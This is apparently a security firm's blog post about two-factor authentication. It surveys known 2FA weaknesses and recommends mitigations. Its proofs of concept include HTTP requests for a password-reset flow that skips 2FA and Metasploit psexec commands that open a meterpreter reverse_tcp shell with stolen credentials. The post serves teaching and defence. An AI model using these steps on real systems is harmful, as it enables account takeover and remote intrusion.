So, you know what 2FA is, right?
Well, the hard theory says:
- ‘Authentication is understood as the procedure to ensure that a person is who he claims to be’.
DISCLAIMER: In this blogpost, SecSignal supposes that via different attack vectors, The Assessment Team already has the credentials to realize a successful first step authentication and needs a way to defeat a 2FA authentication.
Well, let’s start. For a user, there are three ways to confirm this ‘authenticity‘:
– By something that the user knows, like a numeric password.
– By something that the user has, like a hard token.
– By something that the user owns, like the iris of an eye.
Normally, when a user authenticates himself in a system, he is requested for only one of the methods above, the first being the most common. When the user is a victim of password theft, his security becomes completely vulnerable. Here is where 2FA adds a new security layer. This is as simple as adding a second defense factor (like those listed above) – ‘Now, attackers not only have to know my password, they MUST have something that I own‘.
And, how does it work and where can I deploy it?
The environments are undefined. All those who have implemented the first security layer can deploy (complexly or not) the second factor. For example, when a user has to make a transaction through home-banking, he is not just asked for his password, he has to use a ‘Coordinate card‘ or a ‘soft token’ as an extra security layer. Well, there is an example of 2FA, and maybe you didn’t even realize!.
Companies also offer solutions.
2FA is NOT a new trending topic. It has been in development for a long time and it is actively implemented in a lot of public environments, and not surprisingly, big companies have their own deployments. Let’s review some examples:
– Our favorite social networks, like Facebook and Twitter:
– Our mail accounts.
– And why not, our bank accounts.
– Finally, have you seen this in any movie?
And obviously, there are public vulnerabilities.
As in every security environment, when new security techniques are implemented, there are researchers exploiting them. From web applications to infrastructure platforms, this exploitation is always occurring. One interesting point about exploiting a 2FA: the attacker not only focuses on a certain technology/platform (like any implementation), but it also points completely to the end user security.
Some attacks will be reviewed below on different implementations that have been publicly disclosed, starting from 2FA based on text messages:
- In mid-2017, a series of vulnerabilities were found on the SS7 protocol (Signaling System 7). This protocol allows inter-operation between carriers (this simply means that the protocol allows sending/receiving text messages, from any part of the world). Over the course of a few years, multiple vulnerabilities have been disclosed, such as messages interceptions. In this particular scenario, the attacker could redirect an OTP message to another number.
This technique is really difficult to exploit (but not impossible), and a series of data is required:
- The attacker MUST know user and password (the first factor…)
- The attacker MUST know the victim’s phone number, in order to redirect the SMS.
- With this information gathered, it is possible to take control of the compromised account.
NOTE: For further information, please read the following link: https://www.ptsecurity.com/upload/ptcom/SS7_WP_A4.ENG.0036.01.DEC.28.2014.pdf
- Another ‘vulnerability‘ presented by SMS-based authentications are PUSH notifications sent to mobile devices. Although it is not a vulnerability in a protocol like the previous case, this technique is a series of misconfigurations that are explained below.
- SMS notifications are activated automatically and they allow ‘Preview’.
- An attacker who knows the telephone number of his victim and has physical access to it (even if it’s blocked) can see the security code, because it is shown in the preview.
- Many applications, when setting up the 2FA, do it via QR codes (for example LastPass and GMail). In mid-2017, LastPass generated a QR code that contained a ‘secret’ (crypto-challenge) which was used by the user to generate valid 2FA codes. This QR code was stored under a URL that could be derived from the user’s password. This means that an attacker who has the password of a user could compromise the 2FA.
- Also, it was possible to deactivate the 2FA through CSRF attacks, for example by Phishing attacks
These were exploiting examples of alternative methods to a password, breaking the ‘something that you have‘ factor. Now, here are some examples of exploiting the ‘something you own‘ factor:
- A common implementation of this authentication factor is the fingerprint on smartphones; for example, when purchasing an app. In this case, many images are stored in the phone’s DB, containing the model of the fingerprint. When the user uses his print, this fingerprint image is compared to the one that was stored. Over time, various techniques (that call to mind science-fiction movies) have been developed to skip this verification, for example:
- Using a high-resolution camera, the attacker tries to obtain a photograph of the victim’s fingerprint.
- With laser printers, the attacker creates a mold from layers of skin. In these scenarios, glue and glycerol are usually used to simulate human skin and retain the impression.
And now, why don’t we exploit one of these implementations ? Real PoC #1.
In this case, we will explain a vulnerability that was widely exploited in the Internet. It is common to find this poor configuration nowadays in custom implementations. We are facing a website, which obviously supports 2FA. The application, like almost all apps, implements password reset functionality, and that will be our point of impact.
Most web applications work in the following way:
– The user forgets his password and asks for a password reset.
– An email is sent to the user, containing a unique code.
– The user changes his password and is redirected to the homepage.
So, did you realise where is the 2FA bypass? In the last step, when the new password is submitted, the 2FA is not prompted and its bypassed.
Additionally, in order to exploit the lack of 2FA authentication via the password reset mechanism, it is necessary to have gotten access to the email victim before. This could be achieved via Phishing Emails or by reusing the password obtained during the first factor authentication. The following image shows an email of a reset password attempt. Below it, the request for ‘Recover your password’ is loading.
GET /resetpassword.html?token=eyJhbGciOiJub25lIn0.eyJodG1sVGVtcGxhdGUiOiJyZXNldC1wYXNzd29yZCIsImFjdGlvbiI6IklOVEVSTkFMX1JFU0VUX1BBU1NXT1JEIiwiY2FsbGJhY2tVcmwiOiJodHRwczovL2hhY2tlZDJmYS5jb20vcmVzZXRwYXNzd29yZC5odG1sIiwiZXhwaXJhdGlvbiI6MTQzMCwiZXhwIjoxNTE4MjkzMTI0LCJ1c2VySWQiOiJqdXN0dGVzdGluZ0AyZmEuY29tIiwiZW1haWwiOiJqdXN0dGVzdGluZ0AyZmEuY29tIiwibm90aWZpY2F0aW9uVGVtcGxhdGVDb2RlIjoiaW50ZXJuYWxyZXNldHBhc3MifQ.2huNQs1KM07jErbbeQ9nJjawFmCj9g31noz4j6X61uY&[email protected]&action=INTERNAL_RESET_PASSWORD&htmlTemplate=resetpassword HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
So, nothing is odd here. Now, it’s time to fill the form and send our new password.
POST /newPassword HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/plain, */*
So, here the vulnerability is exploited. Instead of a redirection to /login, the application leads us to our /home page, bypassing the 2FA implementation.
HTTP/1.1 302 Found
Date: Another they on Earth GMT
When the password is updated in the DB, the user MUST be redirected to perform the authentication, so he has to send his password and, of course, the 2FA.
Now, let’s hit Windows. Real PoC #2 & #3
Another example (and more realistic) is implementing 2FA with Windows 10.
[#] Setting up 2FA in Windows 10 & Outlook.
You can synchronize your Microsoft account with Windows 10 so that at time of authentication, you will be requested for your Outlook/Hotmail password. Obviously, if you have set up 2FA, it will be prompted too. Here are the steps for enabling 2FA on Hotmail/Outlook, and then how to implement it in Windows 10:
- First, log in to your account following this link. It will redirect you to the advance configuration of your account.
- In the middle of the page is the option for Set up Two-Step Verification.
- You can verify your identity with multiple options. In my case, I chose ‘An app’.
- You will have to download Authenticator for iOS, Android or Windows Phone and continue with the process. It depends on which platform you have chosen. For iOS/Windows Phone you will have to scan a QR code with Authenticator; for Android, you just have to log in with the account that you want to pair.
Once you have done that, it’s time to go to our Windows 10 machine:
- Go to Windows Settings -> Accounts -> Your Info -> Manage my Microsoft accounts.
- You have to log in with your Hotmail account and then you will be asked for your 2FA (which was configured before).
- Now, every time that you authenticate through Windows 10, your password & 2FA will be prompted.
[#] What are we going to abuse? Lets make a PoC too.
SMB (Server Message Block) is a client-server request-response protocol for sharing files, printers, ports and a lot of other things. Commonly, clients connect to servers using TCP/IP. Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system.
SMB can run over session network layers in several ways:
- Directly over TCP, on port 445.
- Via the NetBIOS API, which it turn can run on transport layer:
- On UDP ports 137/138 and TCP ports 137/139
By default, 2FA is not supported in SMB protocol and other countermeasures have to be implemented to protect it. Now, a technique is presented in order to bypass a default implementation of 2FA in Windows 10.
[#] We have our target, now we need the weapon.
What we need is a tool for communicating over SMB which enables a remote administration of our target. For this task, PsExec is our best utilty. Again, the hard theory says that PsExec is:
“Mark Russinovich wrote this utility as part of his sysInternals suite in the late 90s to help Windows Administrators perform important tasks, for example to execute commands or run executables on remote systems. The PSExec utility requires a few things on the remote system: the Server Message Block (SMB) service must be available and reachable (e.g. not blocked by firewall); File and Print Sharing must be enabled; and Simple File Sharing must be disabled.”
So this is exactly what we need.
[#] Exploiting the bug
Assuming (as we mentioned in the first paragraph of the blogpost) that we already have compromised a valid account and password from a user, it is now the moment to exploit his machine remotely.
Our utility, PsExec is available from Metasploit, so let’s call it:
When Metasploit has opened, let’s call our tool:
$ msf > use exploit/windows/smb/psexec
Now, we just have to complete the following statements:
$ msf > set SMBUser [username]
$ msf > set SMBPass [password]
$ msf > set RHOST [target host]
$ msf > set RPORT [target port]
$ msf > set payload windows/meterpreter/reverse_tcp
And that’s all. Now see how we can authenticate to the affected host without the 2FA.
[#] And is there any protection for this?
In order to prevent an attacker from bypassing your 2FA controls, the following steps can be implemented:
- If it is not necessary, turn off file and printer sharing.
- Blocking traffic on ports 445, 139 and 135. Even a Windows firewall can perform this task.
- Just configure one local administrator account with a strong password and remove it from the domain.
- If PowerShell is activated but it is not necessary, disable it.
[#] Another note -> PoC #3
If you don’t have a Microsoft Account, a lot of services for 2FA are available. For this scenario, we will focus on a certain product:
For setting this up, at first you have to download the app for your mobile, with the following link:
And then, install it from https://saaspass.com/downloads.html in your Windows 10 machine. For pairing, your computer will ask for your SAASID (it’s in your mobile app) and everything is ready.
And, how do I exploit this flaw and how can I mitigate it?
Well, the steps are the same as the example above with the Hotmail/Outlook account!
Custom implementations must be aware of these attacks. Here are some recommendations.
We will make a list with each authentication factor and a series of recommendations on each one, discussing what you should protect and what should you control, trying to implement both as safely as possible:
- Something you know. The general recommendations for passwords:
- Set a minimum number of characters (>8).
- Incorporate numbers, letters and some special character.
- Block the account after 5 failed attempts.
- These simple recommendations help to prevent dictionary attacks and brute force on passwords.
- Something you have:
- When using hard/soft tokens, generate at least 6 digits.
- After 1 minute, the code should expire.
- After using the code, it should expire.
- The code must not be predictable (always random numbers, with no mathematical logic)
- After 3 failed attempts, the code should be invalidated.
- These simple recommendations help to prevent guessing the code, and limiting brute force attacks (for example, the code is ONE valid number in 600000 possibles, and the attacker just has 3 attempts).
- Something you own. These security techniques require a lot of knowledge. Here, we will try to demonstrate an iris recognition algorithm:
- Locate the iris correctly.
- Adjust the contours of the iris using the RANSAC technique (Random Sample Consenus).
- Normalize and enhance the iris.
- Perform a ‘polar’ transformation and equalize the histogram.
- Extract data of the iris via cross-correlation methods
- Perform verification of matches using the PSR (Peak to Sidelobe Ratio) as a measure of similarity.
And, if you don’t want an ad-hoc solution, here are other recommendations.
In case you do not want to implement an ad-hoc solution, here we show how to synchronize the solutions offered by the market to daily applications
- One of the most widely used nowadays, allowing protection with 2FA for Google services. Many companies use Google mail servers as a corporate mail solution, so using the 2FA in this scenario is extremely important.
- Synchronization is very simple. Once authenticated in your account, Google will send a text message to the phone you indicate, to make sure that mobile device is yours and only you have access. Once validated, you will see in the Google Authenticator app the name of your synchronized account and a series of numbers (OTP) that will change every minute.
- If you want to keep your 2nd FA organized in a single place, it is possible to acquire applications that manage all of these centrally. Duo Mobile maintains a series of services (such as Amazon, Slack, Microsoft and others) that allow the 2FA be stored all in a single application, generating codes automatically in a centralized way, working as a 2FA manager. You only have to indicate which service you want to register and the different accesses will be generated.